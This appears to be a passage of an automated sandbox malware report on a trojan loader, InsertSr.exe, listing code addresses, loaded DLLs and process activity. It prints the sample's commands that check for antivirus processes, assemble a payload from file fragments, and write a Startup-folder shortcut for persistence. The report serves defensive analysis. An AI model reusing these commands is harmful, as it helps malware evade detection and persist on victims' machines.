      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004AE6F019_2_004AE6F0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C282A19_2_004C282A
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D89BF19_2_004D89BF
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D6A7419_2_004D6A74
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00520A3A19_2_00520A3A
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004B0BE019_2_004B0BE0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004CCD5119_2_004CCD51
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004FEDB219_2_004FEDB2
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00508E4419_2_00508E44
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00520EB719_2_00520EB7
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D6FE619_2_004D6FE6
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004AB02019_2_004AB020
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C33B719_2_004C33B7
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004BD45D19_2_004BD45D
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004CF40919_2_004CF409
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004A94E019_2_004A94E0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004A166319_2_004A1663
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004BF62819_2_004BF628
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004AF6A019_2_004AF6A0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C16B419_2_004C16B4
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C78C319_2_004C78C3
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C1BA819_2_004C1BA8
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004CDBA519_2_004CDBA5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D9CE519_2_004D9CE5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004A9C8019_2_004A9C80
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004BDD2819_2_004BDD28
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C1FC019_2_004C1FC0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004CBFD619_2_004CBFD6
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A23F522_2_001A23F5
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0020840022_2_00208400
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001B650222_2_001B6502
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001B265E22_2_001B265E
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0018E6F022_2_0018E6F0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A282A22_2_001A282A
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001B89BF22_2_001B89BF
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_00200A3A22_2_00200A3A
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001B6A7422_2_001B6A74
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_00190BE022_2_00190BE0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001ACD5122_2_001ACD51
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001DEDB222_2_001DEDB2
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E8E4422_2_001E8E44
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_00200EB722_2_00200EB7
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001B6FE622_2_001B6FE6
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0018B02022_2_0018B020
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A33B722_2_001A33B7
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001AF40922_2_001AF409
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0019D45D22_2_0019D45D
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001894E022_2_001894E0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0019F62822_2_0019F628
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0018166322_2_00181663
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A16B422_2_001A16B4
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0018F6A022_2_0018F6A0
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A78C322_2_001A78C3
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A1BA822_2_001A1BA8
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001ADBA522_2_001ADBA5
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_00189C8022_2_00189C80
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001B9CE522_2_001B9CE5
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0019DD2822_2_0019DD28
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001ABFD622_2_001ABFD6
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001A1FC022_2_001A1FC0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: String function: 004062A3 appears 58 times
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: String function: 00191A36 appears 34 times
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: String function: 001A8B30 appears 42 times
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: String function: 001A0D17 appears 70 times
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: String function: 004C8B30 appears 42 times
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: String function: 004C0D17 appears 70 times
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: String function: 004B1A36 appears 34 times
      Source: InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs InsertSr.exe
      Source: InsertSr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@32/21@3/6
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050A6AD GetLastError,FormatMessageW,19_2_0050A6AD
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004F8DE9 AdjustTokenPrivileges,CloseHandle,19_2_004F8DE9
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_004F9399
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001D8DE9 AdjustTokenPrivileges,CloseHandle,22_2_001D8DE9
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001D9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,22_2_001D9399
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00504148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,19_2_00504148
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0050443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,19_2_0050443D
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifFile created: C:\Users\user\AppData\Local\Immersive Creations CoJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
      Source: C:\Users\user\Desktop\InsertSr.exeFile created: C:\Users\user\AppData\Local\Temp\nsc9DBC.tmpJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat
      Source: InsertSr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\InsertSr.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: InsertSr.exeReversingLabs: Detection: 15%
      Source: C:\Users\user\Desktop\InsertSr.exeFile read: C:\Users\user\Desktop\InsertSr.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\InsertSr.exe "C:\Users\user\Desktop\InsertSr.exe"
      Source: C:\Users\user\Desktop\InsertSr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 316094
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SequenceOctoberContributionRef" Recreation
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif Intranet.pif u
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exit
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D"
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
      Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr"
      Source: C:\Users\user\Desktop\InsertSr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 316094Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SequenceOctoberContributionRef" Recreation Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif Intranet.pif uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifProcess created: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif C:\Users\user\AppData\Local\Temp\316094\Intranet.pifJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D"Jump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrProcess created: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" Jump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: iconcodecservice.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrSection loaded: wshbth.dllJump to behavior
